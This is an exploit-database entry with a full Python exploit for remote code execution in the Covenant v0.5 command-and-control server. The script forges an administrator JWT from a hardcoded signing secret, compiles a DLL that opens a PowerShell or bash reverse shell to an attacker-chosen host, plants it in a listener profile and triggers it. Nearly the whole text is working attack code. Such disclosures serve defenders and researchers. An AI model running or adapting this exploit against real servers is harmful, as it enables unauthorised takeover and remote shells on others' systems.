Headline
Covenant 0.5 Remote Code Execution
Covenant version 0.5 suffers from a remote code execution vulnerability.
# Exploit Title: Covenant v0.5 - Remote Code Execution (RCE)# Exploit Author: xThaz# Author website: https://xthaz.fr/# Date: 2022-09-11# Vendor Homepage: https://cobbr.io/Covenant.html# Software Link: https://github.com/cobbr/Covenant# Version: v0.1.3 - v0.5# Tested on: Windows 11 compiled covenant (Windows defender disabled), Linux covenant docker# Vulnerability## Discoverer: coastal## Date: 2020-07-13## Discoverer website: https://blog.null.farm## References:## - https://blog.null.farm/hunting-the-hunters## - https://github.com/Zeop-CyberSec/covenant_rce/blob/master/covenant_jwt_rce.rb# !/usr/bin/env python3# encoding: utf-8import jwt # pip3 install PyJWTimport jsonimport warningsimport base64import reimport randomimport argparsefrom requests.packages.urllib3.exceptions import InsecureRequestWarningfrom Crypto.Hash import HMAC, SHA256 # pip3 install pycryptodomefrom Crypto.Util.Padding import padfrom Crypto.Cipher import AESfrom requests import request # pip3 install requestsfrom subprocess import runfrom pwn import remote, context # pip3 install pwntoolsfrom os import remove, urandomfrom shutil import whichfrom urllib.parse import urlparsefrom pathlib import Pathfrom time import timedef check_requirements(): if which("mcs") is None: print("Please install the mono framework in order to compile the payload.") print("https://www.mono-project.com/download/stable/") exit(-1)def random_hex(length): alphabet = "0123456789abcdef" return ''.join(random.choice(alphabet) for _ in range(length))def request_api(method, token, route, body=""): warnings.simplefilter('ignore', InsecureRequestWarning) return request( method, f"{args.target}/api/{route}", json=body, headers={ "Authorization": f"Bearer {token}", "Content-Type": "application/json" }, verify=False )def craft_jwt(username, userid=f"{random_hex(8)}-{random_hex(4)}-{random_hex(4)}-{random_hex(4)}-{random_hex(12)}"): secret_key = '%cYA;YK,lxEFw[&P{2HwZ6Axr,{e&3o_}_P%NX+(q&0Ln^#hhft9gTdm\'q%1ugAvfq6rC' payload_data = { "sub": username, "jti": "925f74ca-fc8c-27c6-24be-566b11ab6585", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": userid, "http://schemas.microsoft.com/ws/2008/06/identity/claims/role": [ "User", "Administrator" ], "exp": int(time()) + 360, "iss": "Covenant", "aud": "Covenant" } token = jwt.encode(payload_data, secret_key, algorithm='HS256') return tokendef get_id_admin(token, json_roles): id_admin = "" for role in json_roles: if role["name"] == "Administrator": id_admin = role["id"] print(f"\t[*] Found the admin group id : {id_admin}") break else: print("\t[!] Did not found admin group id, quitting !") exit(-1) id_admin_user = "" json_users_roles = request_api("get", token, f"users/roles").json() for user_role in json_users_roles: if user_role["roleId"] == id_admin: id_admin_user = user_role["userId"] print(f"\t[*] Found the admin user id : {id_admin_user}") break else: print("\t[!] Did not found admin id, quitting !") exit(-1) json_users = request_api("get", token, f"users").json() for user in json_users: if user["id"] == id_admin_user: username_admin = user["userName"] print(f"\t[*] Found the admin username : {username_admin}") return username_admin, id_admin_user else: print("\t[!] Did not found admin username, quitting !") exit(-1)def compile_payload(): if args.os == "windows": payload = '"powershell.exe", "-nop -c \\"$client = New-Object System.Net.Sockets.TCPClient(\'' + args.lhost + '\',' + args.lport + ');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\""' else: payload = '"bash", "-c \\"exec bash -i &>/dev/tcp/' + args.lhost + '/' + args.lport + ' <&1\\""' dll = """using System;using System.Reflection;namespace ExampleDLL{ public class Class1{ public Class1(){ } public void Main(string[] args){ System.Diagnostics.Process.Start(""" + payload + """); } }}""" temp_dll_path = f"/tmp/{random_hex(8)}" Path(f"{temp_dll_path}.cs").write_bytes(dll.encode()) print(f"\t[*] Writing payload in {temp_dll_path}.cs") compilo_path = which("mcs") compilation = run([compilo_path, temp_dll_path + ".cs", "-t:library"]) if compilation.returncode: print("\t[!] Error when compiling DLL, quitting !") exit(-1) print(f"\t[*] Successfully compiled the DLL in {temp_dll_path}.dll") dll_encoded = base64.b64encode(Path(f"{temp_dll_path}.dll").read_bytes()).decode() remove(temp_dll_path + ".cs") remove(temp_dll_path + ".dll") print(f"\t[*] Removed {temp_dll_path}.cs and {temp_dll_path}.dll") return dll_encodeddef generate_wrapper(dll_encoded): wrapper = """public static class MessageTransform { public static string Transform(byte[] bytes) { try { string assemblyBase64 = \"""" + dll_encoded + """\"; var assemblyBytes = System.Convert.FromBase64String(assemblyBase64); var assembly = System.Reflection.Assembly.Load(assemblyBytes); foreach (var type in assembly.GetTypes()) { object instance = System.Activator.CreateInstance(type); object[] args = new object[] { new string[] { \"\" } }; try { type.GetMethod(\"Main\").Invoke(instance, args); } catch {} } } catch {} return System.Convert.ToBase64String(bytes); } public static byte[] Invert(string str) { return System.Convert.FromBase64String(str); }}""" return wrapperdef upload_profile(token, wrapper): body = { 'httpUrls': [ '/en-us/index.html', '/en-us/docs.html', '/en-us/test.html' ], 'httpRequestHeaders': [ {'name': 'User-Agent', 'value': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 ' 'Safari/537.36'}, {'name': 'Cookie', 'value': 'ASPSESSIONID={GUID}; SESSIONID=1552332971750'} ], 'httpResponseHeaders': [ {'name': 'Server', 'value': 'Microsoft-IIS/7.5'} ], 'httpPostRequest': 'i=a19ea23062db990386a3a478cb89d52e&data={DATA}&session=75db-99b1-25fe4e9afbe58696-320bea73', 'httpGetResponse': '{DATA}', 'httpPostResponse': '{DATA}', 'id': 0, 'name': random_hex(8), 'description': '', 'type': 'HTTP', 'messageTransform': wrapper } response = request_api("post", token, "profiles/http", body) if not response.ok: print("\t[!] Failed to create the listener profile, quitting !") exit(-1) else: profile_id = response.json().get('id') print(f"\t[*] Profile created with id {profile_id}") print("\t[*] Successfully created the listener profile") return profile_iddef generate_valid_listener_port(impersonate_token, tries=0): if tries >= 10: print("\t[!] Tried 10 times to generate a listener port but failed, quitting !") exit(-1) port = random.randint(8000, 8250) # TO BE EDITED WITH YOUR TARGET LISTENER PORT listeners = request_api("get", impersonate_token, "listeners").json() port_used = [] for listener in listeners: port_used.append(listener["bindPort"]) if port in port_used: print(f"\t[!] Port {port} is already taken by another listener, retrying !") generate_valid_listener_port(impersonate_token, tries + 1) else: print(f"\t[*] Port {port} seems free") return portdef get_id_listener_type(impersonate_token, listener_name): response = request_api("get", impersonate_token, "listeners/types") if not response.ok: print("\t[!] Failed to get the listener type, quitting !") exit(-1) else: for listener_type in response.json(): if listener_type["name"] == listener_name: print(f'\t[*] Found id {listener_type["id"]} for listener {listener_name}') return listener_type["id"]def generate_listener(impersonate_token, profile_id): listener_port = generate_valid_listener_port(impersonate_token) listener_name = random_hex(8) data = { 'useSSL': False, 'urls': [ f"http://0.0.0.0:{listener_port}" ], 'id': 0, 'name': listener_name, 'bindAddress': "0.0.0.0", 'bindPort': listener_port, 'connectAddresses': [ "0.0.0.0" ], 'connectPort': listener_port, 'profileId': profile_id, 'listenerTypeId': get_id_listener_type(impersonate_token, "HTTP"), 'status': 'Active' } response = request_api("post", impersonate_token, "listeners/http", data) if not response.ok: print("\t[!] Failed to create the listener, quitting !") exit(-1) else: print("\t[*] Successfully created the listener") listener_id = response.json().get("id") return listener_id, listener_portdef create_grunt(impersonate_token, data): stager_code = request_api("put", impersonate_token, "launchers/binary", data).json()["stagerCode"] if stager_code == "": stager_code = request_api("post", impersonate_token, "launchers/binary", data).json()["stagerCode"] if stager_code == "": print("\t[!] Failed to create the grunt payload, quitting !") exit(-1) print("\t[*] Successfully created the grunt payload") return stager_codedef get_grunt_config(impersonate_token, listener_id): data = { 'id': 0, 'listenerId': listener_id, 'implantTemplateId': 1, 'name': 'Binary', 'description': 'Uses a generated .NET Framework binary to launch a Grunt.', 'type': 'binary', 'dotNetVersion': 'Net35', 'runtimeIdentifier': 'win_x64', 'validateCert': True, 'useCertPinning': True, 'smbPipeName': 'string', 'delay': 0, 'jitterPercent': 0, 'connectAttempts': 0, 'launcherString': 'GruntHTTP.exe', 'outputKind': 'consoleApplication', 'compressStager': False } stager_code = create_grunt(impersonate_token, data) aes_key = re.search(r'FromBase64String\(@\"(.[A-Za-z0-9+\/=]{40,50}?)\"\);', stager_code) guid_prefix = re.search(r'aGUID = @"(.{10}[0-9a-f]?)";', stager_code) if not aes_key or not guid_prefix: print("\t[!] Failed to retrieve the grunt configuration, quitting !") exit(-1) aes_key = aes_key.group(1) guid_prefix = guid_prefix.group(1) print(f"\t[*] Found the grunt configuration {[aes_key, guid_prefix]}") return aes_key, guid_prefixdef aes256_cbc_encrypt(key, message): iv_bytes = urandom(16) key_decoded = base64.b64decode(key) encoded_message = pad(message.encode(), 16) cipher = AES.new(key_decoded, AES.MODE_CBC, iv_bytes) encrypted = cipher.encrypt(encoded_message) hmac = HMAC.new(key_decoded, digestmod=SHA256) signature = hmac.update(encrypted).digest() return encrypted, iv_bytes, signaturedef trigger_exploit(listener_port, aes_key, guid): message = "<RSAKeyValue><Modulus>tqwoOYfwOkdfax+Er6P3leoKE/w5wWYgmb/riTpSSWCA6T2JklWrPtf9z3s/k0wIi5pX3jWeC5RV5Y/E23jQXPfBB9jW95pIqxwhZ1wC2UOVA8eSCvqbTpqmvTuFPat8ek5piS/QQPSZG98vLsfJ2jQT6XywRZ5JgAZjaqmwUk/lhbUedizVAnYnVqcR4fPEJj2ZVPIzerzIFfGWQrSEbfnjp4F8Y6DjNSTburjFgP0YdXQ9S7qCJ983vM11LfyZiGf97/wFIzXf7pl7CsA8nmQP8t46h8b5hCikXl1waEQLEW+tHRIso+7nBv7ciJ5WgizSAYfXfePlw59xp4UMFQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>" ciphered, iv, signature = aes256_cbc_encrypt(aes_key, message) data = { "GUID": guid, "Type": 0, "Meta": '', "IV": base64.b64encode(iv).decode(), "EncryptedMessage": base64.b64encode(ciphered).decode(), "HMAC": base64.b64encode(signature).decode() } json_data = json.dumps(data).encode("utf-8") payload = f"i=a19ea23062db990386a3a478cb89d52e&data={base64.urlsafe_b64encode(json_data).decode()}&session=75db-99b1-25fe4e9afbe58696-320bea73" if send_exploit(listener_port, "Cookie", guid, payload): print("\t[*] Exploit succeeded, check listener") else : print("\t[!] Exploit failed, retrying") if send_exploit(listener_port, "Cookies", guid, payload): print("\t[*] Exploit succeeded, check listener") else: print("\t[!] Exploit failed, quitting")def send_exploit(listener_port, header_cookie, guid, payload): context.log_level = 'error' request = f"""POST /en-us/test.html HTTP/1.1\rHost: {IP_TARGET}:{listener_port}\rUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\r{header_cookie}: ASPSESSIONID={guid}; SESSIONID=1552332971750\rContent-Type: application/x-www-form-urlencoded\rContent-Length: {len(payload)}\r\r{payload}""".encode() sock = remote(IP_TARGET, listener_port) sock.sendline(request) response = sock.recv().decode() sock.close() if "HTTP/1.1 200 OK" in response: return True else: return Falseif __name__ == "__main__": check_requirements() parser = argparse.ArgumentParser() parser.add_argument("target", help="URL where the Covenant is hosted, example : https://127.0.0.1:7443") parser.add_argument("os", help="Operating System of the target", choices=["windows", "linux"]) parser.add_argument("lhost", help="IP of the machine that will receive the reverse shell") parser.add_argument("lport", help="Port of the machine that will receive the reverse shell") args = parser.parse_args() IP_TARGET = urlparse(args.target).hostname print("[*] Getting the admin info") sacrificial_token = craft_jwt("xThaz") roles = request_api("get", sacrificial_token, "roles").json() admin_username, admin_id = get_id_admin(sacrificial_token, roles) impersonate_token = craft_jwt(admin_username, admin_id) print(f"\t[*] Impersonated {[admin_username]} with the id {[admin_id]}") print("[*] Generating payload") dll_encoded = compile_payload() wrapper = generate_wrapper(dll_encoded) print("[*] Uploading malicious listener profile") profile_id = upload_profile(impersonate_token, wrapper) print("[*] Generating listener") listener_id, listener_port = generate_listener(impersonate_token, profile_id) print("[*] Triggering the exploit") aes_key, guid_prefix = get_grunt_config(impersonate_token, listener_id) trigger_exploit(listener_port, aes_key, f"{guid_prefix}{random_hex(10)}")